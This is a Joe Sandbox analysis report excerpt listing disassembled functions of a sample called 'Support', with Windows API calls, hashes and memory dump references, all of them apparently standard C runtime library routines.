Instruction Fuzzy Hash: C0E04631000118EFCF11AF54DD09ACA3B6BEF48342B089018FA168A331DB35DE82CA94

Function 0061A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0061A490,?,?,00000008,?,?,0061A130,00000000), ref: 0061A6C2

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 478a86e4ae8f531452efe7aa9bec1d5a43bb6021705252199c94a601b01ed18d
Instruction ID: bad8bfdc2dd12469e9b85d49c236a1298a1d445f03f136628a3af22d73001984
Opcode Fuzzy Hash: 478a86e4ae8f531452efe7aa9bec1d5a43bb6021705252199c94a601b01ed18d
Instruction Fuzzy Hash: B9B16B752116089FD715CF68C48ABE47BE2FF44364F298658E89ACF3A1C335DA82CB41

Function 00611BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00611BEA

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5ca1040814c4de809017d556a5411d220aea3270b0ce249b319bace5dfe417d2
Instruction ID: c32dd40a4781b2b1955ed897ef9069f5336187c077f84a4c24fe172527c54695
Opcode Fuzzy Hash: 5ca1040814c4de809017d556a5411d220aea3270b0ce249b319bace5dfe417d2
Instruction Fuzzy Hash: 41514971E146098BDB24CF65E8917EEBBF2FB59345F18902AC501EF364D3749981CB90

Function 00611AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00611300), ref: 00611AB1

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4e93b2397badce915138a2cdfb370f411c0727482c7907e3c5f4d3a8c99bad1e
Instruction ID: 5bed8a45c30135b9f8bfe91f097f53f20b64f55095ccd14c474c773ea1eab563
Opcode Fuzzy Hash: 4e93b2397badce915138a2cdfb370f411c0727482c7907e3c5f4d3a8c99bad1e
Instruction Fuzzy Hash:

Function 00616893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00616893

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 6c4c3abe1b560fa390c9c1ab7faf6577bbd44132777496344940c5ce966c8a49
Instruction ID: 9ad2279126de35dc5612e397e562010215e9f29b4cc7134b762d521b494eca83
Opcode Fuzzy Hash: 6c4c3abe1b560fa390c9c1ab7faf6577bbd44132777496344940c5ce966c8a49
Instruction Fuzzy Hash: 55A01230200102AB53108F305A5A20835AA55005C070A60155104C0020D72040505A02

Function 00616507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 0061654B

Part of subcall function 00616078: _free.LIBCMT ref: 00616095
Part of subcall function 00616078: _free.LIBCMT ref: 006160A7
Part of subcall function 00616078: _free.LIBCMT ref: 006160B9
Part of subcall function 00616078: _free.LIBCMT ref: 006160CB
Part of subcall function 00616078: _free.LIBCMT ref: 006160DD
Part of subcall function 00616078: _free.LIBCMT ref: 006160EF
Part of subcall function 00616078: _free.LIBCMT ref: 00616101
Part of subcall function 00616078: _free.LIBCMT ref: 00616113
Part of subcall function 00616078: _free.LIBCMT ref: 00616125
Part of subcall function 00616078: _free.LIBCMT ref: 00616137
Part of subcall function 00616078: _free.LIBCMT ref: 00616149
Part of subcall function 00616078: _free.LIBCMT ref: 0061615B
Part of subcall function 00616078: _free.LIBCMT ref: 0061616D

_free.LIBCMT ref: 00616540

Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891

_free.LIBCMT ref: 00616562
_free.LIBCMT ref: 00616577
_free.LIBCMT ref: 00616582
_free.LIBCMT ref: 006165A4
_free.LIBCMT ref: 006165B7
_free.LIBCMT ref: 006165C5
_free.LIBCMT ref: 006165D0
_free.LIBCMT ref: 00616608
_free.LIBCMT ref: 0061660F
_free.LIBCMT ref: 0061662C
_free.LIBCMT ref: 00616644

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 34d8b5552da35e95e413ad34a85956fa6617eca71f86e21ed41f6858006daeb9
Instruction ID: 26e1624284094fec2cc406aa0dfaf24140da53a9a45ce8bd6e6ac418a343601e
Opcode Fuzzy Hash: 34d8b5552da35e95e413ad34a85956fa6617eca71f86e21ed41f6858006daeb9
Instruction Fuzzy Hash: 14314B756106409FEBA0AA7AE805BDA77EBAF40350F18852EF449D72A1DE30EDC0CB54

Function 00614330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00614344

Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891

_free.LIBCMT ref: 00614350
_free.LIBCMT ref: 0061435B
_free.LIBCMT ref: 00614366
_free.LIBCMT ref: 00614371
_free.LIBCMT ref: 0061437C
_free.LIBCMT ref: 00614387
_free.LIBCMT ref: 00614392
_free.LIBCMT ref: 0061439D
_free.LIBCMT ref: 006143AB

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 72720cdbd3ae937673244056613fb536468ac2bf1e85d5a539682db0f1dbbf22
Instruction ID: 6034545b89010c02cf611f56dfb23a6702a71601cfbcdd16220a735f4ac564bc
Opcode Fuzzy Hash: 72720cdbd3ae937673244056613fb536468ac2bf1e85d5a539682db0f1dbbf22
Instruction Fuzzy Hash: 77118976610188FFCBC1EF96D842CD93B66EF44750F5941AAB9084F262DA31DE909B84

Function 00617AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,006154C8,00000000,?,?,?,00617D05,?,?,00000100), ref: 00617B0E
__alloca_probe_16.LIBCMT ref: 00617B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00617D05,?,?,00000100,5EFC4D8B,?,?), ref: 00617B94
__alloca_probe_16.LIBCMT ref: 00617C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00617C8E
__freea.LIBCMT ref: 00617C9B

Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331

__freea.LIBCMT ref: 00617CA4
__freea.LIBCMT ref: 00617CC9

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: d4826a40b9447f4deb9c1f29abb5b8f231b9a67b73716971c68493732b01a3f5
Instruction ID: 7169981d6050acab567986e733a5fd3b952b9eacf4f281526f2507d6d01f5222
Opcode Fuzzy Hash: d4826a40b9447f4deb9c1f29abb5b8f231b9a67b73716971c68493732b01a3f5
Instruction Fuzzy Hash: 8651AC72614216AFEB258E64CC81EEB77BBEB84750B1D8629FC04D6250EB74DCC096A0

Function 00618417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00618B8C,?,00000000,?,00000000,00000000), ref: 00618459
__fassign.LIBCMT ref: 006184D4
__fassign.LIBCMT ref: 006184EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00618515
WriteFile.KERNEL32(?,?,00000000,00618B8C,00000000,?,?,?,?,?,?,?,?,?,00618B8C,?), ref: 00618534
WriteFile.KERNEL32(?,?,00000001,00618B8C,00000000,?,?,?,?,?,?,?,?,?,00618B8C,?), ref: 0061856D

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3819779335fb5b088562d352b13849488a7e469b308c5a8c90366e91db45bdfb
Instruction ID: 8c30fc00d01b1b9023dfd186b1d719bf7e83b288f0af44aba2a58b7305cbb97e
Opcode Fuzzy Hash: 3819779335fb5b088562d352b13849488a7e469b308c5a8c90366e91db45bdfb
Instruction Fuzzy Hash: B65174719002499FDB10CFA8D885AEEBBF7EF19300F18815AE555E7291DB309981CB60

Function 00611E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00611E37
___except_validate_context_record.LIBVCRUNTIME ref: 00611E3F
_ValidateLocalCookies.LIBCMT ref: 00611EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00611EF3
_ValidateLocalCookies.LIBCMT ref: 00611F48

Strings

csm, xrefs: 00611EDD

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: be9f96654a582a9fdbf8a98fad790d4675307b89ba8ce7413c5e2c6158d25e5a
Instruction ID: 99391d09fe15717dbb42e256685e2fb29089bff365b20c2aeed5b25befad6876
Opcode Fuzzy Hash: be9f96654a582a9fdbf8a98fad790d4675307b89ba8ce7413c5e2c6158d25e5a
Instruction Fuzzy Hash: 1F41C234A00209ABCF10DF68C881ADEBBB6BF46364F1C8059ED149F392D7319A91CB90

Function 0061621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006161DF: _free.LIBCMT ref: 00616208

_free.LIBCMT ref: 00616269

Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891

_free.LIBCMT ref: 00616274
_free.LIBCMT ref: 0061627F
_free.LIBCMT ref: 006162D3
_free.LIBCMT ref: 006162DE
_free.LIBCMT ref: 006162E9
_free.LIBCMT ref: 006162F4

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: 497dcc0e7e64bde8588ba77267729101ed9b1c5efc64b6c190c04d24ed1b1a03
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: BD118135540B54BAD5E0B7B8CC0BFCB779E5F40700F48482CB69AA7093DA75FA844654

Function 006123D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,006123C8,0061209F,00611AFC), ref: 006123DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006123ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00612406
SetLastError.KERNEL32(00000000,006123C8,0061209F,00611AFC), ref: 00612458

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eb4f585ccb1c61e38f6133db35f77873bf03ea23f4dbc6f2c7f8e62f58d5046a
Instruction ID: 3d102986582c60d076a04d70285705d59fb2fe5e6a4446839851cd60ac85c437
Opcode Fuzzy Hash: eb4f585ccb1c61e38f6133db35f77873bf03ea23f4dbc6f2c7f8e62f58d5046a
Instruction Fuzzy Hash: 4401283210C76F5FA7242774BCA59E72797DB123B4738123EF520442E4EF110CE25184

Function 00614424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,00616D69,?,?,?,006204C8,0000002C,00613F34,00000016,0061209F,00611AFC), ref: 00614428
_free.LIBCMT ref: 0061445B
_free.LIBCMT ref: 00614483
SetLastError.KERNEL32(00000000), ref: 00614490
SetLastError.KERNEL32(00000000), ref: 0061449C
_abort.LIBCMT ref: 006144A2

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 64a8e24d9abeedbf35098a704c42e5e3e09544e9911b7312961f6f3effef7527
Instruction ID: 63a0e6ea0410d687fad4d5364dba3cc9cecb49daaf60883779ac336bc4d6f2ca
Opcode Fuzzy Hash: 64a8e24d9abeedbf35098a704c42e5e3e09544e9911b7312961f6f3effef7527
Instruction Fuzzy Hash: D5F02831504AC0A6C3A2B734AC19FEB22ABDBC57B2B2C8419F52DD7291EF61C9C25125

Function 006136FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006136AD,?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002), ref: 0061371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0061372F
FreeLibrary.KERNEL32(00000000,?,?,?,006136AD,?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000), ref: 00613752

Strings

CorExitProcess, xrefs: 00613727
mscoree.dll, xrefs: 00613715

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6df01e0b462424031124aad5baa00e0e9d4aa3974682e4e656678a4f12b4d986
Instruction ID: 96dc88799609f01b0d0027d8b29f4642ee0d96751bdf5045275c503077db48c5
Opcode Fuzzy Hash: 6df01e0b462424031124aad5baa00e0e9d4aa3974682e4e656678a4f12b4d986
Instruction Fuzzy Hash: 3AF06D70900218BBCB159FA0DC49BEE7FF6DF08752F095055F90596250DB305E85CB54

Function 0061634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,006154C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0061639A
__alloca_probe_16.LIBCMT ref: 006163D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00616423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00616435
__freea.LIBCMT ref: 0061643E

Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 6cd33e9678ad3d00e281517fc1d7df8b170e7ebdbdcdf285ea98e0a1d946e00e
Instruction ID: 359d98c5e111644d6597d28cf927863fdff3f12c94f26655f2a841bde76dd1dd
Opcode Fuzzy Hash: 6cd33e9678ad3d00e281517fc1d7df8b170e7ebdbdcdf285ea98e0a1d946e00e
Instruction Fuzzy Hash: 6F31CF76A0021AABDF25DF65DC45DEE7BA6EF04710F088169FC14DA250E735CD91CBA0

Function 0061561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00615627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0061564A

Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00615670
_free.LIBCMT ref: 00615683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00615692

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 8cdb0557051e7fd77cc6ebd302282be0229f4a4a83e4e32c1d765c53b568d41f
Instruction ID: eadfc8934c9cb24c38522197164ea00875a451862ca61cd224627f82736855a6
Opcode Fuzzy Hash: 8cdb0557051e7fd77cc6ebd302282be0229f4a4a83e4e32c1d765c53b568d41f
Instruction Fuzzy Hash: 4E01D472601B55BF27211AAA5C4CCFBAA6FDEC7BA135E012EF806C3210EB608C4191F1

Function 006144A8 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,006147FE,00617E79,?,0061686F,?,00000004,00000000,?,?,?,00613BCD,?,00000000), ref: 006144AD
_free.LIBCMT ref: 006144E2
_free.LIBCMT ref: 00614509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00614516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0061451F

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a74197c66d6f0383224b0c04ba0d2e3d98595850c6be8622f053c4684b732bc8
Instruction ID: 5b2f02fe039ac2d95b3917e83ad6f2cb374d534e2a3b55184a975b31dc6b38ef
Opcode Fuzzy Hash: a74197c66d6f0383224b0c04ba0d2e3d98595850c6be8622f053c4684b732bc8
Instruction Fuzzy Hash: DA012D36200A40AB8362AB356C85EEB126FEBD577272C5029F519E3282EF74CDC25024

Function 00616176 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0061618E

Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891

_free.LIBCMT ref: 006161A0
_free.LIBCMT ref: 006161B2
_free.LIBCMT ref: 006161C4
_free.LIBCMT ref: 006161D6

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
